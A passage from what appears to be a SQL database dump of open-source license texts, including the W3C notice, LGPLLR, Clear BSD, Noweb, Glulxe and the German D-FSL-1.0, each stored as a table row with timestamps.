HOLDERS\nMAKE NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT\nLIMITED TO, WARRANTIES OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE\nOR THAT THE USE OF THE SOFTWARE OR DOCUMENTATION WILL NOT INFRINGE ANY THIRD\nPARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS.\n\nCOPYRIGHT HOLDERS WILL NOT BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL OR\nCONSEQUENTIAL DAMAGES ARISING OUT OF ANY USE OF THE SOFTWARE OR DOCUMENTATION.\n\nThe name and trademarks of copyright holders may NOT be used in advertising\nor publicity pertaining to the software without specific, written prior permission.\nTitle to copyright in this software and any associated documentation will\nat all times remain with copyright holders. ____________________________________\n\nThis formulation of W3C\'s notice and license became active on August 14 1998\nso as to improve compatibility with GPL. This version ensures that W3C software\nlicensing terms are no more restrictive than GPL and consequently W3C software\nmay be distributed in GPL packages. See the older formulation for the policy\nprior to this date. Please see our Copyright FAQ for common questions about\nusing materials from our site, including specific terms and conditions for\npackages like libwww, Amaya, and Jigsaw. Other questions about this notice\ncan be directed to site-policy@w3.org.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(272,'LGPLLR','Lesser General Public License For Linguistic Resources\n\nPreamble\n\nThe licenses for most data are designed to take away your freedom to share\nand change it. By contrast, this License is intended to guarantee your freedom\nto share and change free data--to make sure the data are free for all their\nusers.\n\nThis License, the Lesser General Public License for Linguistic Resources,\napplies to some specially designated linguistic resources -- typically lexicons\nand grammars.\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n0. This License Agreement applies to any Linguistic Resource which contains\na notice placed by the copyright holder or other authorized party saying it\nmay be distributed under the terms of this Lesser General Public License for\nLinguistic Resources (also called \"this License\"). Each licensee is addressed\nas \"you\".\n\nA \"linguistic resource\" means a collection of data about language prepared\nso as to be used with application programs.\n\nThe \"Linguistic Resource\", below, refers to any such work which has been distributed\nunder these terms. A \"work based on the Linguistic Resource\" means either\nthe Linguistic Resource or any derivative work under copyright law: that is\nto say, a work containing the Linguistic Resource or a portion of it, either\nverbatim or with modifications and/or translated straightforwardly into another\nlanguage. (Hereinafter, translation is included without limitation in the\nterm \"modification\".)\n\n\"Legible form\" for a linguistic resource means the preferred form of the resource\nfor making modifications to it.\n\nActivities other than copying, distribution and modification are not covered\nby this License; they are outside its scope. The act of running a program\nusing the Linguistic Resource is not restricted, and output from such a program\nis covered only if its contents constitute a work based on the Linguistic\nResource (independent of the use of the Linguistic Resource in a tool for\nwriting it). Whether that is true depends on what the program that uses the\nLinguistic Resource does.\n\n1. You may copy and distribute verbatim copies of the Linguistic Resource\nas you receive it, in any medium, provided that you conspicuously and appropriately\npublish on each copy an appropriate copyright notice and disclaimer of warranty;\nkeep intact all the notices that refer to this License and to the absence\nof any warranty; and distribute a copy of this License along with the Linguistic\nResource.\n\nYou may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\n2. You may modify your copy or copies of the Linguistic Resource or any portion\nof it, thus forming a work based on the Linguistic Resource, and copy and\ndistribute such modifications or work under the terms of Section 1 above,\nprovided that you also meet all of these conditions:\n\n a) The modified work must itself be a linguistic resource.\n\nb) You must cause the files modified to carry prominent notices stating that\nyou changed the files and the date of any change.\n\nc) You must cause the whole of the work to be licensed at no charge to all\nthird parties under the terms of this License.\n\nThese requirements apply to the modified work as a whole. If identifiable\nsections of that work are not derived from the Linguistic Resource, and can\nbe reasonably considered independent and separate works in themselves, then\nthis License, and its terms, do not apply to those sections when you distribute\nthem as separate works. But when you distribute the same sections as part\nof a whole which is a work based on the Linguistic Resource, the distribution\nof the whole must be on the terms of this License, whose permissions for other\nlicensees extend to the entire whole, and thus to each and every part regardless\nof who wrote it.\n\nThus, it is not the intent of this section to claim rights or contest your\nrights to work written entirely by you; rather, the intent is to exercise\nthe right to control the distribution of derivative or collective works based\non the Linguistic Resource.\n\nIn addition, mere aggregation of another work not based on the Linguistic\nResource with the Linguistic Resource (or with a work based on the Linguistic\nResource) on a volume of a storage or distribution medium does not bring the\nother work under the scope of this License.\n\n3. A program that contains no derivative of any portion of the Linguistic\nResource, but is designed to work with the Linguistic Resource (or an encrypted\nform of the Linguistic Resource) by reading it or being compiled or linked\nwith it, is called a \"work that uses the Linguistic Resource\". Such a work,\nin isolation, is not a derivative work of the Linguistic Resource, and therefore\nfalls outside the scope of this License.\n\nHowever, combining a \"work that uses the Linguistic Resource\" with the Linguistic\nResource (or an encrypted form of the Linguistic Resource) creates a package\nthat is a derivative of the Linguistic Resource (because it contains portions\nof the Linguistic Resource), rather than a \"work that uses the Linguistic\nResource\". If the package is a derivative of the Linguistic Resource, you\nmay distribute the package under the terms of Section 4. Any works containing\nthat package also fall under Section 4.\n\n4. As an exception to the Sections above, you may also combine a \"work that\nuses the Linguistic Resource\" with the Linguistic Resource (or an encrypted\nform of the Linguistic Resource) to produce a package containing portions\nof the Linguistic Resource, and distribute that package under terms of your\nchoice, provided that the terms permit modification of the package for the\ncustomer\'s own use and reverse engineering for debugging such modifications.\n\nYou must give prominent notice with each copy of the package that the Linguistic\nResource is used in it and that the Linguistic Resource and its use are covered\nby this License. You must supply a copy of this License. If the package during\nexecution displays copyright notices, you must include the copyright notice\nfor the Linguistic Resource among them, as well as a reference directing the\nuser to the copy of this License. Also, you must do one of these things:\n\na) Accompany the package with the complete corresponding machine-readable\nlegible form of the Linguistic Resource including whatever changes were used\nin the package (which must be distributed under Sections 1 and 2 above); and,\nif the package contains an encrypted form of the Linguistic Resource, with\nthe complete machine-readable \"work that uses the Linguistic Resource\", as\nobject code and/or source code, so that the user can modify the Linguistic\nResource and then encrypt it to produce a modified package containing the\nmodified Linguistic Resource.\n\nb) Use a suitable mechanism for combining with the Linguistic Resource. A\nsuitable mechanism is one that will operate properly with a modified version\nof the Linguistic Resource, if the user installs one, as long as the modified\nversion is interface-compatible with the version that the package was made\nwith.\n\nc) Accompany the package with a written offer, valid for at least three years,\nto give the same user the materials specified in Subsection 4a, above, for\na charge no more than the cost of performing this distribution.\n\nd) If distribution of the package is made by offering access to copy from\na designated place, offer equivalent access to copy the above specified materials\nfrom the same place.\n\ne) Verify that the user has already received a copy of these materials or\nthat you have already sent this user a copy.\n\nIf the package includes an encrypted form of the Linguistic Resource, the\nrequired form of the \"work that uses the Linguistic Resource\" must include\nany data and utility programs needed for reproducing the package from it.\nHowever, as a special exception, the materials to be distributed need not\ninclude anything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the operating\nsystem on which the executable runs, unless that component itself accompanies\nthe executable.\n\nIt may happen that this requirement contradicts the license restrictions of\nproprietary libraries that do not normally accompany the operating system.\nSuch a contradiction means you cannot use both them and the Linguistic Resource\ntogether in a package that you distribute.\n\n5. You may not copy, modify, sublicense, link with, or distribute the Linguistic\nResource except as expressly provided under this License. Any attempt otherwise\nto copy, modify, sublicense, link with, or distribute the Linguistic Resource\nis void, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under this\nLicense will not have their licenses terminated so long as such parties remain\nin full compliance.\n\n6. You are not required to accept this License, since you have not signed\nit. However, nothing else grants you permission to modify or distribute the\nLinguistic Resource or its derivative works. These actions are prohibited\nby law if you do not accept this License. Therefore, by modifying or distributing\nthe Linguistic Resource (or any work based on the Linguistic Resource), you\nindicate your acceptance of this License to do so, and all its terms and conditions\nfor copying, distributing or modifying the Linguistic Resource or works based\non it.\n\n7. Each time you redistribute the Linguistic Resource (or any work based on\nthe Linguistic Resource), the recipient automatically receives a license from\nthe original licensor to copy, distribute, link with or modify the Linguistic\nResource subject to these terms and conditions. You may not impose any further\nrestrictions on the recipients\' exercise of the rights granted herein. You\nare not responsible for enforcing compliance by third parties with this License.\n\n8. If, as a consequence of a court judgment or allegation of patent infringement\nor for any other reason (not limited to patent issues), conditions are imposed\non you (whether by court order, agreement or otherwise) that contradict the\nconditions of this License, they do not excuse you from the conditions of\nthis License. If you cannot distribute so as to satisfy simultaneously your\nobligations under this License and any other pertinent obligations, then as\na consequence you may not distribute the Linguistic Resource at all. For example,\nif a patent license would not permit royalty-free redistribution of the Linguistic\nResource by all those who receive copies directly or indirectly through you,\nthen the only way you could satisfy both it and this License would be to refrain\nentirely from distribution of the Linguistic Resource.\n\nIf any portion of this section is held invalid or unenforceable under any\nparticular circumstance, the balance of the section is intended to apply,\nand the section as a whole is intended to apply in other circumstances.\n\nIt is not the purpose of this section to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis section has the sole purpose of protecting the integrity of the free\nresource distribution system which is implemented by public license practices.\nMany people have made generous contributions to the wide range of data distributed\nthrough that system in reliance on consistent application of that system;\nit is up to the author/donor to decide if he or she is willing to distribute\nresources through any other system and a licensee cannot impose that choice.\n\nThis section is intended to make thoroughly clear what is believed to be a\nconsequence of the rest of this License.\n\n9. If the distribution and/or use of the Linguistic Resource is restricted\nin certain countries either by patents or by copyrighted interfaces, the original\ncopyright holder who places the Linguistic Resource under this License may\nadd an explicit geographical distribution limitation excluding those countries,\nso that distribution is permitted only in or among countries not thus excluded.\nIn such case, this License incorporates the limitation as if written in the\nbody of this License.\n\n10. The Free Software Foundation may publish revised and/or new versions of\nthe Lesser General Public License for Linguistic Resources from time to time.\nSuch new versions will be similar in spirit to the present version, but may\ndiffer in detail to address new problems or concerns.\n\nEach version is given a distinguishing version number. If the Linguistic Resource\nspecifies a version number of this License which applies to it and \"any later\nversion\", you have the option of following the terms and conditions either\nof that version or of any later version published by the Free Software Foundation.\nIf the Linguistic Resource does not specify a license version number, you\nmay choose any version ever published by the Free Software Foundation.\n\n11. If you wish to incorporate parts of the Linguistic Resource into other\nfree programs whose distribution conditions are incompatible with these, write\nto the author to ask for permission.\n\n NO WARRANTY\n\n12. BECAUSE THE LINGUISTIC RESOURCE IS LICENSED FREE OF CHARGE, THERE IS NO\nWARRANTY FOR THE LINGUISTIC RESOURCE, TO THE EXTENT PERMITTED BY APPLICABLE\nLAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR\nOTHER PARTIES PROVIDE THE LINGUISTIC RESOURCE \"AS IS\" WITHOUT WARRANTY OF\nANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.\nTHE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LINGUISTIC RESOURCE\nIS WITH YOU. SHOULD THE LINGUISTIC RESOURCE PROVE DEFECTIVE, YOU ASSUME THE\nCOST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n13. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE LINGUISTIC RESOURCE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE LINGUISTIC RESOURCE (INCLUDING BUT\nNOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED\nBY YOU OR THIRD PARTIES OR A FAILURE OF THE LINGUISTIC RESOURCE TO OPERATE\nWITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGES.\n\nEND OF TERMS AND CONDITIONS\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(273,'Font-exception-2.0','As a special exception, if you create a document which uses this font, and embed this font or unaltered portions of this font into the document, this font does not by itself cause the resulting document to be covered by the GNU General Public License. This exception does not however invalidate any other reasons why the document might be covered by the GNU General Public License. If you modify this font, you may extend this exception to your version of the font, but you are not obligated to do so. If you do not wish to do so, delete this exception statement from your version.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(274,'BSD-3-Clause-Clear','The Clear BSD License\n\nCopyright (c) [xxxx]-[xxxx] [Owner Organization]\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted (subject to the limitations in the disclaimer below) provided\nthat the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of [Owner Organization] nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nNO EXPRESS OR IMPLIED LICENSES TO ANY PARTY\'S PATENT RIGHTS ARE GRANTED BY\nTHIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(275,'Bahyph','COPYRIGHT NOTICE\n\nThese patterns and the generating sh script are Copyright (c) GMV 1991\n\nThese patterns were developed for internal GMV use and are made public in\nthe hope that they will benefit others. Also, spreading these patterns throughout\nthe Spanish-language TeX community is expected to provide back-benefits to\nGMV in that it can help keeping GMV in the mainstream of spanish users.\n\nHowever, this is given for free and WITHOUT ANY WARRANTY. Under no circumstances\ncan Julio Sanchez, GMV, Jos\'e A. Ma~nas or any agents or representatives thereof\nbe held responsible for any errors in this software nor for any damages derived\nfrom its use, even in case any of the above has been notified of the possibility\nof such damages. If any such situation arises, you responsible for repair.\nUse of this software is an explicit acceptance of these conditions.\n\nYou can use this software for any purpose. You cannot delete this copyright\nnotice. If you change this software, you must include comments explaining\nwho, when and why. You are kindly requested to send any changes to tex@gmv.es.\nIf you change the generating script, you must include code in it such that\nany output is clearly labeled as generated by a modified script. Despite the\nlack of warranty, we would like to hear about any problem you find. Please\nreport problems to tex@gmv.es. END OF COPYRIGHT NOTICE\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(276,'Noweb','Noweb is copyright 1989-2000 by Norman Ramsey. All rights reserved.\n\nNoweb is protected by copyright. It is not public-domain software or shareware,\nand it is not protected by a ``copyleft\'\' agreement like the one used by the\nFree Software Foundation.\n\nNoweb is available free for any use in any field of endeavor. You may redistribute\nnoweb in whole or in part provided you acknowledge its source and include\nthis COPYRIGHT file. You may modify noweb and create derived works, provided\nyou retain this copyright notice, but the result may not be called noweb without\nmy written consent.\n\nYou may sell noweb if you wish. For example, you may sell a CD-ROM including\nnoweb.\n\nYou may sell a derived work, provided that all source code for your derived\nwork is available, at no additional charge, to anyone who buys your derived\nwork in any form. You must give permisson for said source code to be used\nand modified under the terms of this license. You must state clearly that\nyour work uses or is based on noweb and that noweb is available free of change.\nYou must also request that bug reports on your work be reported to you.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(277,'Glulxe','The source code in this package is copyright 1999-2010 by Andrew Plotkin.\n\nYou may copy and distribute it freely, by any means and under any conditions,\nas long as the code and documentation is not changed. You may also incorporate\nthis code into your own program and distribute that, or modify this code and\nuse and distribute the modified version, as long as you retain a notice in\nyour program or documentation which mentions my name and the URL shown above.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(278,'D-FSL-1.0','Deutsche Freie Software Lizenz\n\n(c) Ministerium für Wissenschaft und Forschung Nordrhein-Westfalen 2004 Erstellt\nvon Axel Metzger und Till Jaeger, Institut für Rechtsfragen der Freien und\nOpen Source Software - ( http://www.ifross.de ) .\n\nPräambel\n\nSoftware ist mehr als ein Wirtschaftsgut. Sie ist die technische Grundlage\nder Informationsgesellschaft. Die Frage der Teilhabe der Allgemeinheit ist\ndeswegen von besonderer Bedeutung. Herkömmlich lizenzierte Programme werden\nnur im Object Code vertrieben, der Nutzer darf das Programm weder verändern\nnoch weitergeben. Das Lizenzmodell der Freien Software (synonym \"Open Source\nSoftware\") gewährt Ihnen dagegen umfassende Freiheiten im Umgang mit dem Programm.\nDie Deutsche Freie Software Lizenz folgt diesem Lizenzmodell. Sie gewährt\nIhnen das Recht, das Programm in umfassender Weise zu nutzen. Es ist Ihnen\ngestattet, das Programm nach Ihren Vorstellungen zu verändern, in veränderter\noder unveränderter Form zu vervielfältigen, zu verbreiten und öffentlich zugänglich\nzu machen. Diese Rechte werden unentgeltlich eingeräumt.\n\nDie Deutsche Freie Software Lizenz verbindet die Rechtseinräumung allerdings\nmit Pflichten, die dem Zweck dienen, das freie Zirkulieren des Programms und\naller veröffentlichten Fortentwicklungen zu sichern. Wenn Sie das Programm\nverbreiten oder öffentlich zugänglich machen, dann müssen Sie jedem, der das\nProgramm von Ihnen erhält, eine Kopie dieser Lizenz mitliefern und den Zugriff\nauf den Source Code ermöglichen. Eine weitere Pflicht betrifft Fortentwicklungen\ndes Programms. Änderungen am Programm, die Sie öffentlich verbreiten oder\nzugänglich machen, müssen nach den Bestimmungen dieser Lizenz frei gegeben\nwerden.\n\nDie Deutsche Freie Software Lizenz nimmt auf die besonderen Anforderungen\ndes deutschen und europäischen Rechts Rücksicht. Sie ist zweisprachig gestaltet\nund damit auch auf den internationalen Vertrieb ausgerichtet.\n\n \n\n § 0 Definitionen\n\n \n\nDokumentation: Die Beschreibung des Aufbaus und/oder der Struktur der Programmierung\nund/oder der Funktionalitäten des Programms, unabhängig davon, ob sie im Source\nCode oder gesondert vorgenommen wird.\n\n \n\nLizenz: Die zwischen dem Lizenzgeber und Ihnen geschlossene Vereinbarung mit\ndem Inhalt der \"Deutschen Freien Software Lizenz\" bzw. das Angebot hierzu.\n\n \n\nLizenznehmer: Jede natürliche oder juristische Person, die die Lizenz angenommen\nhat.\n\n \n\nProgramm: Jedes Computerprogramm, das von den Rechtsinhabern nach den Bestimmungen\ndieser Lizenz verbreitet oder öffentlich zugänglich gemacht worden ist.\n\n \n\n Object Code: Die maschinenlesbare, übersetzte Form des Programms.\n\n \n\nÖffentlich: Nicht nur an einen bestimmten Personenkreis gerichtet, der persönlich\noder durch die Zugehörigkeit zu einer juristischen Person oder einem öffentlichen\nTräger miteinander verbunden ist.\n\n \n\nÖffentlich zugänglich machen: Die öffentliche Weitergabe des Programms in\nunkörperlicher Form, insbesondere das Bereithalten zum Download in Datennetzen.\n\n \n\nRechtsinhaber: Der bzw. die Urheber oder sonstigen Inhaber der ausschließlichen\nNutzungsrechte an dem Programm.\n\n \n\nSource Code: Die für Menschen lesbare, in Programmiersprache dargestellte\nForm des Programms.\n\n \n\nVerändern: Jede Erweiterung, Kürzung und Bearbeitung des Programms, insbesondere\nWeiterentwicklungen.\n\n \n\nVerbreiten: Die öffentliche Weitergabe körperlicher Vervielfältigungsstücke,\ninsbesondere auf Datenträgern oder in Verbindung mit Hardware.\n\n \n\nVollständiger Source Code: Der Source Code in der für die Erstellung bzw.\ndie Bearbeitung benutzten Form zusammen mit den zur Übersetzung und Installation\nerforderlichen Konfigurationsdateien und Software-Werkzeugen, sofern diese\nin der benötigten Form nicht allgemein gebräuchlich (z.B. Standard-Kompiler)\noder für jedermann lizenzgebührenfrei im Internet abrufbar sind.\n\n \n\n § 1 Rechte\n\n(1) Sie dürfen das Programm in unveränderter Form vervielfältigen, verbreiten\nund öffentlich zugänglich machen.\n\n(2) Sie dürfen das Programm verändern und entsprechend veränderte Versionen\nvervielfältigen, verbreiten und öffentlich zugänglich machen. Gestattet ist\nauch die Kombination des Programms oder Teilen hiervon mit anderen Programmen.\n\n (3) Sie erhalten die Rechte unentgeltlich.\n\n \n\n § 2 Pflichten beim Vertrieb\n\n(1) Wenn Sie das Programm verbreiten oder öffentlich zugänglich machen, sei\nes in unveränderter oder veränderter Form, sei es in einer Kombination mit\nanderen Programmen oder in Verbindung mit Hardware, dann müssen sie mitliefern:\n\n1. alle Vermerke im Source Code und/oder Object Code, die auf diese Lizenz\nhinweisen;\n\n2. alle Vermerke im Source Code und/oder Object Code, die über die Urheber\ndes Programms Auskunft geben;\n\n3. einen für den Empfänger deutlich wahrnehmbaren Hinweis auf diese Lizenz\nund die Internetadresse < http://www.d-fsl.de > ;\n\n 4. den vollständigen Text dieser Lizenz in deutlich wahrnehmbarer Weise.\n\n(2) Wenn bei der Installation des Programms und/oder beim Programmstart Lizenz-\nund/oder Vertragsbedingungen angezeigt werden, dann müssen\n\n 1. diese Lizenz,\n\n 2. ein Hinweis auf diese Lizenz und\n\n3. ein Hinweis auf den oder die Rechtsinhaber an den ersten unter dieser Lizenz\nnutzbaren Programmbestandteilen\n\n ebenfalls angezeigt werden.\n\n(3) Sie dürfen die Nutzung des Programms nicht von Pflichten oder Bedingungen\nabhängig machen, die nicht in dieser Lizenz vorgesehen sind.\n\n(4) Sofern Sie mit dem Programm eine Dokumentation erhalten haben, muss diese\nDokumentation entsprechend mitgeliefert werden, es sei denn, die freie Mitlieferung\nder Dokumentation ist Ihnen aufgrund der Lizenz für die Dokumentation nicht\ngestattet.\n\n \n\n § 3 Weitere Pflichten beim Vertrieb veränderter Versionen\n\n(1) Veränderte Versionen des Programms dürfen Sie nur unter den Bedingungen\ndieser Lizenz verbreiten oder öffentlich zugänglich machen, so dass Dritte\ndas veränderte Programm insgesamt unter dieser Lizenz nutzen können.\n\n(2) Wird das Programm oder ein Teil hiervon mit einem anderen Programm kombiniert,\ngilt auch die Kombination insgesamt als eine veränderte Version des Programms,\nes sei denn, das andere Programm ist formal und inhaltlich eigenständig. Ein\nanderes Programm ist dann als eigenständig anzusehen, wenn es die folgenden\nVoraussetzungen alle erfüllt:\n\n1. Der Source Code der kombinierten Programme muss jeweils in eigenen Dateien\nvorhanden sein, die keine Bestandteile des anderen Teils enthalten, die über\ndie zur Programmkombination üblichen und erforderlichen Informationen über\nden anderen Teil hinausgehen, wobei der Source Code des anderen Programms\nnicht mitgeliefert werden muss.\n\n2. Der mit dem Programm kombinierte Teil muss auch dann sinnvoll nutzbar sein,\nwenn er nicht mit dem Programm kombiniert wird, und zwar entweder alleine\noder mit sonstigen Programmen. Was als \"sinnvoll nutzbar\" anzusehen ist, richtet\nsich nach der Auffassung der betroffenen Fachkreise. Zu den betroffenen Fachkreisen\ngehören alle Personen, die das Programm oder Programme mit vergleichbarer\nFunktionalität entwickeln, benutzen, verbreiten oder öffentlich zugänglich\nmachen.\n\n(3) Wenn Sie das Programm oder einen Teil hiervon - verändert oder unverändert\n- zusammen mit einem anderen Programm verbreiten oder öffentlich zugänglich\nmachen, das unter der GNU General Public License (GPL) lizenziert wird, darf\ndas Programm auch unter den Bedingungen der GPL genutzt werden, sofern es\nmit dem anderen Programm ein \"derivative work\" im Sinne der GPL bildet. Dabei\nsollen die Hinweise auf diese Lizenz entfernt und durch einen Hinweis auf\ndie GPL ersetzt werden. Ob bei der Zusammenstellung ein \"derivate work\" im\nSinne der GPL entsteht, beurteilt sich nach Ziffer 2 b) der GPL. Diese Bestimmung\nlautet: \"You must cause any work that you distribute or publish, that in whole\nor in part contains or is derived from the Program or any part thereof, to\nbe licensed as a whole at no charge to all third parties under the terms of\nthis License.\" Die GPL kann abgerufen werden unter http://www.fsf.org/licenses/gpl.\n\n(4) Wenn Sie das Programm in einer veränderten Form verbreiten oder öffentlich\nzugänglich machen, müssen Sie im Source Code einen Hinweis mit den Änderungen\naufnehmen und mit dem Datum der Änderung versehen. Der Hinweis muss erkennen\nlassen, welche Änderungen vorgenommen wurden und bestehende Vermerke, die\nüber die Urheber des Programms Auskunft geben, übernehmen. Dies gilt unabhängig\ndavon, ob Sie einen eigenen Urhebervermerk hinzufügen. Anstelle eines Hinweises\nim Source Code können Sie auch ein Versionskontrollsystem verwenden oder weiterführen,\nsofern dieses mitverbreitet wird oder öffentlich zugänglich ist.\n\n(5) Sie dürfen von Dritten für die Einräumung eines einfachen Nutzungsrechts\nan veränderten Versionen des Programms kein Entgelt verlangen.\n\n(6) Wenn Sie an der veränderten Version des Programms ein anderes Schutzrecht\nals ein Urheberrecht erwerben, insbesondere ein Patent oder Gebrauchsmuster,\nlizenzieren Sie dieses Schutzrecht für veränderte und unveränderte Versionen\ndes Programms in dem Umfang, der erforderlich ist, um die Rechte aus dieser\nLizenz wahrnehmen zu können.\n\n \n\n § 4 Weitere Pflichten beim Vertrieb im Object Code\n\n(1) Wenn Sie das Programm nur im Object Code verbreiten, dann müssen Sie zusätzlich\nzu den in § 2 und § 3 geregelten Pflichten entweder\n\n1. den vollständigen Source Code im Internet öffentlich zugänglich machen\nund bei der Verbreitung des Object Codes deutlich auf die vollständige Internetadresse\nhinweisen, unter der der Source Code abgerufen werden kann oder\n\n2. den vollständigen Source Code auf einem hierfür üblichen Datenträger unter\nBeachtung der §§ 2 und 3 mitverbreiten.\n\n(2) Wenn Sie das Programm im Object Code öffentlich zugänglich machen, dann\nmüssen Sie zusätzlich zu den in § 2 und § 3 geregelten Pflichten den vollständigen\nSource Code im Internet öffentlich zugänglich machen und dabei deutlich auf\ndie vollständige Internetadresse hinweisen.\n\n(3) Sofern Sie mit dem Programm eine Dokumentation erhalten haben, muss diese\nDokumentation entsprechend der Absätze 1 und 2 mitgeliefert werden, es sei\ndenn, die freie Mitlieferung der Dokumentation ist Ihnen aufgrund der Lizenz\nfür die Dokumentation nicht gestattet.\n\n \n\n § 5 Vertragsschluss\n\n(1) Mit dieser Lizenz wird Ihnen und jeder anderen Person ein Angebot auf\nAbschluss eines Vertrages über die Nutzung des Programms unter den Bedingungen\nder Deutschen Freien Softwarelizenz unterbreitet.\n\n(2) Sie dürfen das Programm nach den jeweils anwendbaren gesetzlichen Vorschriften\nbestimmungsgemäß benutzen, ohne dass es der Annahme dieser Lizenz bedarf.\nDieses Recht umfasst in der Europäischen Union und in den meisten anderen\nRechtsordnungen insbesondere die folgenden Befugnisse:\n\n1. das Programm ablaufen zu lassen sowie die Erstellung von hierfür erforderlichen\nVervielfältigungen im Haupt- und Arbeitsspeicher;\n\n 2. das Erstellen einer Sicherungskopie;\n\n 3. die Fehlerberichtigung;\n\n4. die Weitergabe einer rechtmäßig erworbenen körperlichen Kopie des Programms.\n\n(3) Sie erklären Ihre Zustimmung zum Abschluss dieser Lizenz, indem Sie das\nProgramm verbreiten, öffentlich zugänglich machen, verändern oder in einer\nWeise vervielfältigen, die über die bestimmungsgemäße Nutzung im Sinne von\nAbsatz 2 hinausgeht. Ab diesem Zeitpunkt ist diese Lizenz als rechtlich verbindlicher\nVertrag zwischen den Rechtsinhabern und Ihnen geschlossen, ohne dass es eines\nZugangs der Annahmeerklärung bei den Rechtsinhabern bedarf.\n\n(4) Sie und jeder andere Lizenznehmer erhalten die Rechte aus dieser Lizenz\ndirekt von den Rechtsinhabern. Eine Unterlizenzierung oder Übertragung der\nRechte ist nicht gestattet.\n\n \n\n § 6 Beendigung der Rechte bei Zuwiderhandlung\n\n(1) Jede Verletzung Ihrer Verpflichtungen aus dieser Lizenz führt zu einer\nautomatischen Beendigung Ihrer Rechte aus dieser Lizenz.\n\n(2) Die Rechte Dritter, die das Programm oder Rechte an dem Programm von Ihnen\nerhalten haben, bleiben hiervon unberührt.\n\n \n\n § 7 Haftung und Gewährleistung\n\n(1) Für entgegenstehende Rechte Dritter haften die Rechtsinhaber nur, sofern\nsie Kenntnis von diesen Rechten hatten, ohne Sie zu informieren.\n\n(2) Die Haftung für Fehler und sonstige Mängel des Programms richtet sich\nnach den außerhalb dieser Lizenz getroffenen Vereinbarungen zwischen Ihnen\nund den Rechtsinhabern oder, wenn eine solche Vereinbarung nicht existiert,\nnach den gesetzlichen Regelungen.\n\n \n\n § 8 Verträge mit Dritten\n\n(1) Diese Lizenz regelt nur die Beziehung zwischen Ihnen und den Rechtsinhabern.\nSie ist nicht Bestandteil der Verträge zwischen Ihnen und Dritten.\n\n(2) Die Lizenz beschränkt Sie nicht in der Freiheit, mit Dritten, die von\nIhnen Kopien des Programms erhalten oder Leistungen in Anspruch nehmen, die\nim Zusammenhang mit dem Programm stehen, Verträge beliebigen Inhalts zu schließen,\nsofern Sie dabei Ihren Verpflichtungen aus dieser Lizenz nachkommen und die\nRechte der Dritten aus dieser Lizenz nicht beeinträchtigt werden. Insbesondere\ndürfen Sie für die Überlassung des Programms oder sonstige Leistungen ein\nEntgelt verlangen.\n\n(3) Diese Lizenz verpflichtet Sie nicht, das Programm an Dritte weiterzugeben.\nEs steht Ihnen frei zu entscheiden, wem Sie das Programm zugänglich machen.\nSie dürfen aber die weitere Nutzung durch Dritte nicht durch den Einsatz technischer\nSchutzmaßnahmen, insbesondere durch den Einsatz von Kopierschutzvorrichtungen\njeglicher Art, verhindern oder erschweren. Eine passwortgeschützte Zugangsbeschränkung\noder die Nutzung in einem Intranet wird nicht als technische 